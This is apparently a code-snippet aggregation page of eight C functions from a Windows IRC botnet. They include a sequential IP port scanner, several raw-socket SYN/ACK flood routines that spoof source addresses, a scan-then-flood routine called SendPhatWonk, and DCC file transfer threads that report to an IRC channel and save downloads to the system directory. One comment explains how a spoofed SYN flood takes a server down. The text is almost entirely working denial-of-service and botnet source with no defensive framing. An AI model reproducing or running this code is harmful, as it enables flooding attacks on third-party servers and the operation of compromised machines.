Exemple #1
0
// scan a range of IPs for an open port
DWORD WINAPI ScanThread(LPVOID param)
{
	DWORD id, host;
	HANDLE th;
	char str[128];

	SCAN scan = *((SCAN *)param);
	SCAN *scans = (SCAN *)param;
	scans->gotinfo = TRUE;

	while(1) {
		sprintf(str, "nzm (portscan.plg) »»  Scanning IP: %s, Port: %d.", finet_ntoa(scan.addy), scan.port);
		strncpy(threads[scan.threadnum].name, str, sizeof(threads[scan.threadnum].name)-1);
		if (th = CreateThread(NULL, 0, &ScanConnectThread, (LPVOID)&scan, 0, &id)) {
			while(scan.cgotinfo == FALSE)
				Sleep(50);
		}
		CloseHandle(th);
		scans->cgotinfo = FALSE;
		Sleep(scans->delay);
		memcpy(&host, &scan.addy, 4);
		host = fntohl(host);
		host += 1;
		host = fhtonl(host);
		memcpy(&scan.addy, &host, 4);
	}
	clearthread(scan.threadnum);

	return 0;
 }
Exemple #2
0
unsigned long AdvGetNextIP(int threadnum)
{
	DWORD host;

	memcpy(&host, &advinfo[threadnum].ip, 4);
	host = fntohl(host);
	host += 1;
	host = fhtonl(host);
	memcpy(&advinfo[threadnum].ip, &host, 4);

	return (advinfo[threadnum].ip);
}
Exemple #3
0
DWORD WINAPI TcpFloodThread(LPVOID param) 
{
	TCPFLOOD tcpflood = *((TCPFLOOD *)param);
	TCPFLOOD *tcpfloods = (TCPFLOOD *)param;
	tcpfloods->gotinfo = TRUE;

	char sendbuf[IRCLINE], szSendBuf[60]={0};

	IPHEADER ipHeader; 
	TCPHEADER tcpHeader; 
	PSDHEADER psdHeader; 

	srand(GetTickCount());

	SOCKET ssock;
	if ((ssock=fsocket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == INVALID_SOCKET) {
		sprintf(sendbuf,"[TCP]: Error: socket() failed, returned: <%d>.", fWSAGetLastError());
		if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice);
		addlog(sendbuf);

		clearthread(tcpflood.threadnum);

		ExitThread(0);
	}
	
	BOOL flag = TRUE; 
	if (fsetsockopt(ssock, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag)) == SOCKET_ERROR) { 
		sprintf(sendbuf,"[TCP]: Error: setsockopt() failed, returned: <%d>.", fWSAGetLastError());
		if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice);
		addlog(sendbuf);

		clearthread(tcpflood.threadnum);

		ExitThread(0);
	} 

	if (finet_addr(tcpflood.ip) == INADDR_NONE) {
		sprintf(sendbuf,"[TCP]: Invalid target IP.");
		if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice);
		addlog(sendbuf);

		clearthread(tcpflood.threadnum);

		ExitThread(0);
	}

	SOCKADDR_IN ssin;
	memset(&ssin, 0, sizeof(ssin));	
	ssin.sin_family=AF_INET; 
	ssin.sin_port=fhtons(0); 
	ssin.sin_addr.s_addr=finet_addr(tcpflood.ip); 

	int sent = 0;
	unsigned long start = GetTickCount();

	while (((GetTickCount() - start) / 1000) <= (unsigned long)tcpflood.time) {
		ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long)); 
		ipHeader.total_len=fhtons(sizeof(ipHeader)+sizeof(tcpHeader)); 
		ipHeader.ident=1; 
		ipHeader.frag_and_flags=0; 
		ipHeader.ttl=128; 
		ipHeader.proto=IPPROTO_TCP; 
		ipHeader.checksum=0; 
		ipHeader.sourceIP=((tcpflood.spoof)?(rand()+(rand()<<8)+(rand()<<16)+(rand()<<24)):(finet_addr(GetIP(tcpflood.sock))));
		ipHeader.destIP=ssin.sin_addr.s_addr;
		
		((tcpflood.port == 0)?(tcpHeader.dport=fhtons((unsigned short)(rand()%1025))):(tcpHeader.dport=fhtons(tcpflood.port))); 
		tcpHeader.sport=fhtons((unsigned short)(rand()%1025));  
		tcpHeader.seq=fhtonl(0x12345678); 
		if (strstr(tcpflood.type,"syn")) {
			tcpHeader.ack_seq=0;
			tcpHeader.flags=SYN;
		} else if (strstr(tcpflood.type,"ack")) {
			tcpHeader.ack_seq=0;
			tcpHeader.flags=ACK;
		} else if (strstr(tcpflood.type,"random")) {
			tcpHeader.ack_seq=rand()%3;
			((rand()%2 == 0)?(tcpHeader.flags=SYN):(tcpHeader.flags=ACK));
		}
		tcpHeader.lenres=(sizeof(tcpHeader)/4<<4|0); 
		tcpHeader.window=fhtons(512); 
		tcpHeader.urg_ptr=0; 
		tcpHeader.checksum=0;
		
		psdHeader.saddr=ipHeader.sourceIP; 
		psdHeader.daddr=ipHeader.destIP; 
		psdHeader.zero=0; 
		psdHeader.proto=IPPROTO_TCP; 
		psdHeader.length=fhtons((unsigned short)(sizeof(tcpHeader))); 

		memcpy(szSendBuf, &psdHeader, sizeof(psdHeader)); 
		memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader)); 
		tcpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader)); 
		memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); 
		memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader)); 
		memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4); 
		ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader)); 
		memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); 

		if (fsendto(ssock, (char *)&szSendBuf, sizeof(szSendBuf), 0, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) { 
			fclosesocket(ssock);

			_snprintf(sendbuf,sizeof(sendbuf),"[TCP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.", tcpflood.ip, sent, fWSAGetLastError());
			if (!tcpflood.silent) irc_privmsg(tcpflood.sock, tcpflood.chan, sendbuf, tcpflood.notice); 
			addlog(sendbuf);

			clearthread(tcpflood.threadnum);

			ExitThread(0);
		}
		sent++;
	}
	fclosesocket(ssock);

	sprintf(sendbuf,"[TCP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).", tcpflood.type, tcpflood.ip, sent, (((sent * sizeof(szSendBuf)) / 1024) / tcpflood.time), (((sent * sizeof(szSendBuf)) / 1024) / 1024));
	if (!tcpflood.silent) irc_privmsg(tcpflood.sock, tcpflood.chan, sendbuf, tcpflood.notice); 
	addlog(sendbuf);

	clearthread(tcpflood.threadnum);

	ExitThread(0); 
}
Exemple #4
0
long SendDDOS(unsigned long TargetIP, unsigned int SpoofingIP, char *Type, unsigned short TargetPort, int len)
{ 
	WSADATA WSAData; 
	SOCKET sock; 
	SOCKADDR_IN addr_in; 
	IPHEADER ipHeader; 
	TCPHEADER tcpHeader; 
	PSDHEADER psdHeader; 
 
	LARGE_INTEGER freq, halt_time, cur;
	char szSendBuf[60]={0},buf[64]; 
	int rect;

	if (fWSAStartup(MAKEWORD(2,2), &WSAData)!=0) 
		return FALSE; 
 
	if ((sock = fWSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED )) == INVALID_SOCKET) {
		fWSACleanup();
		return FALSE;
	}

	BOOL flag=TRUE;
	if (fsetsockopt(sock,IPPROTO_IP, IP_HDRINCL,(char *)&flag,sizeof(flag)) == SOCKET_ERROR) {
		fclosesocket(sock);
		fWSACleanup();
		return FALSE; 
	}

	addr_in.sin_family=AF_INET;
	addr_in.sin_port=fhtons((unsigned short)TargetPort);
	addr_in.sin_addr.s_addr=TargetIP;

	ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));
	ipHeader.total_len=fhtons(sizeof(ipHeader)+sizeof(tcpHeader));
	ipHeader.ident=1;
	ipHeader.frag_and_flags=0;
	ipHeader.ttl=128;
	ipHeader.proto=IPPROTO_TCP;
	ipHeader.checksum=0;
	ipHeader.destIP=TargetIP;

	tcpHeader.dport=fhtons((unsigned short)TargetPort);
	tcpHeader.sport=fhtons((unsigned short)rand()%1025);
	tcpHeader.seq=fhtonl(0x12345678);

	/* A SYN attack simply smash its target up with TCP SYN packets. 
	Each SYN packet needs a SYN-ACK response and forces the server to wait for 
	the good ACK in reply. Of course, we just never gives the ACK, since we use a 
	bad IP address (spoof) there's no chance of an ACK returning. 
	This quickly kills a server as it tries to send out SYN-ACKs while waiting for ACKs. 
	When the SYN-ACK queues fill up, the server can no longer take any incoming SYNs, 
	and that's the end of that server until the attack is cleared up.*/

	if (strcmp(Type,"ddos.syn") == 0) {
		tcpHeader.ack_seq=0;
		tcpHeader.flags=SYN;
	} else if (strcmp(Type,"ddos.ack") == 0) {
		tcpHeader.ack_seq=0;
		tcpHeader.flags=ACK;
	} else if (strcmp(Type,"ddos.random") == 0) {
		tcpHeader.ack_seq=rand()%3;
		if (rand()%2 == 0) 
			tcpHeader.flags=SYN;
		else 
			tcpHeader.flags=ACK;
	}
	
	tcpHeader.lenres=(sizeof(tcpHeader)/4<<4|0); 
	tcpHeader.window=fhtons(16384); 
	tcpHeader.urg_ptr=0; 

	long total = 0;
	QueryPerformanceFrequency(&freq);
	QueryPerformanceCounter(&cur);
	halt_time.QuadPart = (freq.QuadPart * len) + cur.QuadPart;
 
	while(TRUE) {
		tcpHeader.checksum=0; 
		tcpHeader.sport=fhtons((unsigned short)((rand() % 1001) + 1000));
		tcpHeader.seq=fhtons((unsigned short)((rand() << 16) | rand()));

		ipHeader.sourceIP=fhtonl(SpoofingIP++); 

		psdHeader.daddr=ipHeader.destIP; 
		psdHeader.zero=0; 
		psdHeader.proto=IPPROTO_TCP; 
		psdHeader.length=fhtons(sizeof(tcpHeader));
		psdHeader.saddr=ipHeader.sourceIP; 
		memcpy(szSendBuf, &psdHeader, sizeof(psdHeader)); 
		memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader));
		
		tcpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader)); 
 
		memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); 
		memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader)); 
		memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4); 
		ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader)); 
 
		memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); 
		rect=fsendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader),0,(LPSOCKADDR)&addr_in, sizeof(addr_in));
		if (rect==SOCKET_ERROR) {
			sprintf(buf, "[DDoS]: Send error: <%d>.",fWSAGetLastError());
			addlog(buf);

			fclosesocket(sock);
			fWSACleanup();
			return 0;
		}
     
		total += rect;
		QueryPerformanceCounter(&cur);
		if (cur.QuadPart >= halt_time.QuadPart)
			break;
	}

	fclosesocket(sock); 
	fWSACleanup(); 
 
	return (total);
}
Exemple #5
0
long SendSyn(unsigned long TargetIP, unsigned int SpoofingIP, unsigned short TargetPort, int len)
{ 
	IPHEADER ipHeader; 
	TCPHEADER tcpHeader; 
	PSDHEADER psdHeader; 
 
	LARGE_INTEGER freq, halt_time, cur;
	char szSendBuf[60]={0},buf[64]; 
	int rect;

	WSADATA WSAData; 
	if (fWSAStartup(MAKEWORD(2,2), &WSAData) != 0)
		return FALSE; 
 
	SOCKET sock; 
	if ((sock = fWSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED)) == INVALID_SOCKET) {
		fWSACleanup();
		return FALSE; 
	}

	BOOL flag=TRUE;
	if (fsetsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(flag)) == SOCKET_ERROR) {
		fclosesocket(sock);
		fWSACleanup();
		return FALSE; 
	}

	SOCKADDR_IN ssin; 
	memset(&ssin, 0, sizeof(ssin));
	ssin.sin_family=AF_INET;
	ssin.sin_port=fhtons(TargetPort);
	ssin.sin_addr.s_addr=TargetIP;

	ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));
	ipHeader.total_len=fhtons(sizeof(ipHeader)+sizeof(tcpHeader));
	ipHeader.ident=1;
	ipHeader.frag_and_flags=0;
	ipHeader.ttl=128;
	ipHeader.proto=IPPROTO_TCP;
	ipHeader.checksum=0;
	ipHeader.destIP=TargetIP;

	tcpHeader.dport=fhtons(TargetPort);
	tcpHeader.ack_seq=0;
	tcpHeader.lenres=(sizeof(tcpHeader)/4<<4|0); 
	tcpHeader.flags=2; 
	tcpHeader.window=fhtons(16384); 
	tcpHeader.urg_ptr=0; 

	long total = 0;
	QueryPerformanceFrequency(&freq);
	QueryPerformanceCounter(&cur);
	halt_time.QuadPart = (freq.QuadPart * len) + cur.QuadPart;
 
	while (1) {
		tcpHeader.checksum=0; 
		tcpHeader.sport=fhtons((unsigned short)((rand() % 1001) + 1000));
		tcpHeader.seq=fhtons((unsigned short)((rand() << 16) | rand()));

		ipHeader.sourceIP=fhtonl(SpoofingIP++); 

		psdHeader.daddr=ipHeader.destIP; 
		psdHeader.zero=0; 
		psdHeader.proto=IPPROTO_TCP; 
		psdHeader.length=fhtons(sizeof(tcpHeader));
		psdHeader.saddr=ipHeader.sourceIP; 
		memcpy(szSendBuf, &psdHeader, sizeof(psdHeader)); 
		memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader));
		
		tcpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader)); 
 
		memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); 
		memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader)); 
		memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4); 
		ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader)); 
 
		memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); 
		rect=fsendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader),0,(LPSOCKADDR)&ssin, sizeof(ssin));
		if (rect==SOCKET_ERROR) {
			sprintf(buf, "[SYN]: Send error: <%d>.",fWSAGetLastError());
			addlog(buf);

			fclosesocket(sock);
			fWSACleanup();
			return 0;
		}
     
		total += rect;
		QueryPerformanceCounter(&cur);
		if (cur.QuadPart >= halt_time.QuadPart)
			break;
	}

	fclosesocket(sock); 
	fWSACleanup(); 
 
	return (total);
}
Exemple #6
0
DWORD WINAPI DCCSendThread(LPVOID param)
{
	DCC dcc = *((DCC *)param);
	DCC *dccs = (DCC *)param;
	dccs->gotinfo = TRUE;

	char sendbuf[IRCLINE],buffer[1024],tmpfile[MAX_PATH];

	int Fsend, bytes_sent;
	unsigned int move;
	unsigned __int64 totalbytes = 0;

	DWORD mode = 0;

	SOCKET ssock;
	while (1) {
		if ((ssock = fsocket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET) {
      		sprintf(sendbuf,"[DCC]: Failed to create socket.");
			break;
		}

		SOCKADDR_IN csin, ssin;
		memset(&ssin, 0, sizeof(ssin));
   		ssin.sin_family = AF_INET;
   		ssin.sin_port = fhtons(0);//random port
		ssin.sin_addr.s_addr = INADDR_ANY;
		
		if (fbind(ssock, (LPSOCKADDR)&ssin, sizeof(ssin)) != 0) {
			sprintf(sendbuf,"[DCC]: Failed to bind to socket.");
			break;
		}
		int ssin_len = sizeof(ssin);
		fgetsockname(ssock, (LPSOCKADDR)&ssin, &ssin_len);

		unsigned short portnum = fntohs(ssin.sin_port);
		for (unsigned int i=0;i <= strlen(dcc.filename); i++)
			tmpfile[i] = ((dcc.filename[i] == 32)?(95):(dcc.filename[i]));

		if (flisten(ssock, 1) != 0) {
			sprintf(sendbuf,"[DCC]: Failed to open socket.");
			break;
		}
		HANDLE testfile = CreateFile(dcc.filename,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,0,0);
		if (testfile == INVALID_HANDLE_VALUE) {
			sprintf(sendbuf,"[DCC]: File doesn't exist.");
			break;
		}

		int length = GetFileSize(testfile,NULL);
		sprintf(sendbuf,"DCC SEND %s %i %i %i",dcc.filename,fhtonl(finet_addr(GetIP(dcc.sock))),portnum,length);
		irc_privmsg(dcc.sock,dcc.sendto,sendbuf,FALSE);

		TIMEVAL timeout;
    	timeout.tv_sec = 60;//timeout after 60 sec.
    	timeout.tv_usec = 0;
		fd_set fd_struct;
		FD_ZERO(&fd_struct);
    	FD_SET(ssock, &fd_struct);

		if (fselect(0, &fd_struct, NULL, NULL, &timeout) <= 0) {
			irc_privmsg(dcc.sock,dcc.sendto,"[DCC]: Send timeout.",dcc.notice);
			break;
		}
		int csin_len = sizeof(csin);
		if ((dcc.csock = faccept(ssock, (LPSOCKADDR)&csin, &csin_len)) == INVALID_SOCKET)  {
			sprintf(sendbuf,"[DCC]: Unable to open socket.");
			break;
		} 
		fclosesocket(ssock);

		while (length) {
			Fsend = 1024;
			if (Fsend>length) 
				Fsend=length;
			move = 0-length;

			memset(buffer,0,sizeof(buffer));
			SetFilePointer(testfile, move, NULL, FILE_END);
			ReadFile(testfile, buffer, Fsend, &mode, NULL);

			bytes_sent = fsend(dcc.csock, buffer, Fsend, 0);
			totalbytes += bytes_sent;

			if (frecv(dcc.csock,buffer ,sizeof(buffer), 0) < 1 || bytes_sent < 1) {
				irc_privmsg(dcc.sock,dcc.sendto,"[DCC]: Socket error.",dcc.notice);
				addlog("[DCC]: Socket error.");

				fclosesocket(dcc.csock);
				clearthread(dcc.threadnum);

				ExitThread(1);
			}
			length = length - bytes_sent;
		}
		if (testfile != INVALID_HANDLE_VALUE) 
			CloseHandle(testfile);
		sprintf(sendbuf,"[DCC]: Transfer complete to IP: %s, Filename: %s (%s bytes).",finet_ntoa(csin.sin_addr),dcc.filename,commaI64(totalbytes));
		break;
	}
	if (!dcc.silent) irc_privmsg(dcc.sock,dcc.sendto,sendbuf,dcc.notice);
	addlog(sendbuf);

	if (ssock > 0)
		fclosesocket(ssock);
	fclosesocket(dcc.csock);
	clearthread(dcc.threadnum);

	ExitThread(0);
}
Exemple #7
0
DWORD WINAPI DCCGetThread(LPVOID param)
{
	DCC dcc = *((DCC *)param);
	DCC *dccs = (DCC *)param;
	dccs->gotinfo = TRUE;

	char sendbuf[IRCLINE],buffer[4096],tmpfile[MAX_PATH];;

	int received = 0;
	unsigned long received2;

	FILE *infile;
	
	SOCKET ssock;

	GetSystemDirectory(tmpfile, sizeof(tmpfile));
	sprintf(tmpfile,"%s%s",tmpfile,dcc.filename);

	while (1) {
		HANDLE testfile = CreateFile(tmpfile,GENERIC_WRITE,FILE_SHARE_READ,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
		if (testfile == INVALID_HANDLE_VALUE) {
			sprintf(sendbuf,"[DCC]: Error unable to write file to disk.");
			break;
		}
		CloseHandle(testfile);

		if ((infile = fopen(tmpfile,"a+b")) == NULL) {
			sprintf(sendbuf,"[DCC]: Error opening file for writing.");
			break;
		}
	
		if ((ssock = CreateSock(dcc.host,dcc.port)) == INVALID_SOCKET) {
			sprintf(sendbuf,"[DCC]: Error opening socket.");
			break;
		}
		DWORD err = 1;
		while (err != 0) {
			memset(buffer,0,sizeof(buffer));

			err = frecv(ssock, buffer, sizeof(buffer), 0);
			if (err == 0) 
				break;
			if (err == SOCKET_ERROR) {
				sprintf(sendbuf,"[DCC]: Socket error.");
				irc_privmsg(dcc.sock,dcc.sendto,sendbuf,dcc.notice);
				addlog(sendbuf);

				fclose(infile);
				fclosesocket(ssock);
				clearthread(dcc.threadnum);

				ExitThread(1);
			}
	
			fwrite(buffer,1,err,infile);
			received = received + err;
			received2 =  fhtonl(received);
			fsend(ssock,(char *)&received2 , 4, 0);
		}
		sprintf(sendbuf,"[DCC]: Transfer complete from IP: %s, Filename: %s (%s bytes).",dcc.host,dcc.filename,commaI64(received));
		break;
	}
	if (!dcc.silent) irc_privmsg(dcc.sock,dcc.sendto,sendbuf,dcc.notice);
	addlog(sendbuf);

	if (infile != NULL) 
		fclose(infile);
	if (ssock > 0) 
		fclosesocket(ssock);
	clearthread(dcc.threadnum);
	
	ExitThread(0);
}
Exemple #8
0
char* SendPhatWonk(unsigned long TargetIP, unsigned int len, int delay)
{
    BOOL flag=TRUE;
	unsigned long lTimerCount=0;
	struct timespec ts;
    int i=0;

	struct sockaddr_in addr;
	int scansock=0;

	sock=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED);

	fsetsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char*)&flag, sizeof(flag));

    srand(GetTickCount());

	unsigned int port[28] = { 1025,21,22,23,25,53,80,81,88,110,113,119,135,
							  137,139,143,443,445,1024,1433,1500,
							  1720,3306,3389,5000,6667,8000,8080 };

	unsigned int openport[28] = {0,0,0};
	static char hitports[1024] = "";
	int hitport=0, lastport=0;
	char tmpMess[]="";
	struct timeval working_timeout;
	working_timeout.tv_sec = 3;
	working_timeout.tv_usec = 3000;

	for (i=0;i<28;i++)
	{
		addr.sin_family = AF_INET;
		addr.sin_addr.s_addr = TargetIP;
		addr.sin_port = fhtons(port[i]);

		scansock = fsocket(AF_INET,SOCK_STREAM,0);
		int result = connect_no_timeout(scansock,(struct sockaddr *)&addr,sizeof(struct sockaddr),&working_timeout);

		fclosesocket(scansock);
		
		if(result == 0)
		{
				openport[i] = port[i];
		}
	}

	sprintf(hitports, " ");

	lTimerCount=GetTickCount();
	
	for (i=0;i<28;i++)
	{

	if ((GetTickCount()-lTimerCount)/1000>len) break;

		if (openport[i] != 0)
		{
			hitport = openport[i];
			//hitports.Format("%s%d ",hitports.CStr(),hitport);
			sprintf(hitports, "%s%d ", hitports, hitport);
		}
		else
		{
			hitport = fhtons (brandom (0, 65535)); // no open ports
		}
	}

	for (;;)
	{
	
	memset(&packet, 0, sizeof(packet));
    ts.tv_sec				= 0;
    ts.tv_nsec				= 10;
    packet.ip.ihl			= 5;
    packet.ip.ver			= 4;
    packet.ip.pro			= IPPROTO_TCP;
    packet.ip.tos			= 0x08;
    packet.ip.id			= fhtons (brandom (1024, 65535));
    packet.ip.tl			= fhtons(sizeof(packet));
    packet.ip.off			= 0;
    packet.ip.ttl			= 255;

    if (!spoofing) 
        packet.ip.src = spoofip(TargetIP);
    else
        packet.ip.src = finet_addr(spoof);

    packet.ip.dst			= TargetIP;
    packet.tcp.flg			= 0;
    packet.tcp.win			= fhtons(16384);
    packet.tcp.seq			= fhtonl (brandom (0, 65535) + (brandom (0, 65535) << 8));
    packet.tcp.ack			= 0;
    packet.tcp.off			= 5;
    packet.tcp.urp			= 0;

	packet.tcp.dst			= hitport;

	cksum.pseudo.daddr		= TargetIP;
    cksum.pseudo.mbz		= 0;
    cksum.pseudo.ptcl		= IPPROTO_TCP;
    cksum.pseudo.tcpl		= fhtons(sizeof(struct xtcphdr));
    s_in.sin_family			= AF_INET;
	s_in.sin_addr.s_addr	= TargetIP;
    s_in.sin_port			= packet.tcp.dst;

	for(i=0;i<1023;++i) {
	/* 
	send 1 syn packet + 1023 ACK packets. 
	*/
    if(i==0) {
	packet.tcp.src = fhtons (brandom (0, 65535));
	cksum.pseudo.saddr = packet.ip.src;
	packet.tcp.flg = SYN;
    packet.tcp.ack = 0;
    }
    else {
	packet.tcp.flg = ACK;
	packet.tcp.ack = fhtons (brandom (0, 65535));
    }
       ++packet.ip.id;
       ++packet.tcp.seq;
       s_in.sin_port = packet.tcp.dst;
       packet.ip.sum         = 0;
       packet.tcp.sum        = 0;
       cksum.tcp             = packet.tcp;
       packet.ip.sum         = checksum((unsigned short *)&packet.ip, 20);
       packet.tcp.sum        = checksum((unsigned short *)&cksum, sizeof(cksum));

       fsendto(sock, (const char *)&packet, sizeof(packet), 0, (struct sockaddr *)&s_in, sizeof(s_in));
	   }

	if((GetTickCount()-lTimerCount)/1000>len) break;
	Sleep(delay);
    }
	return hitports;
}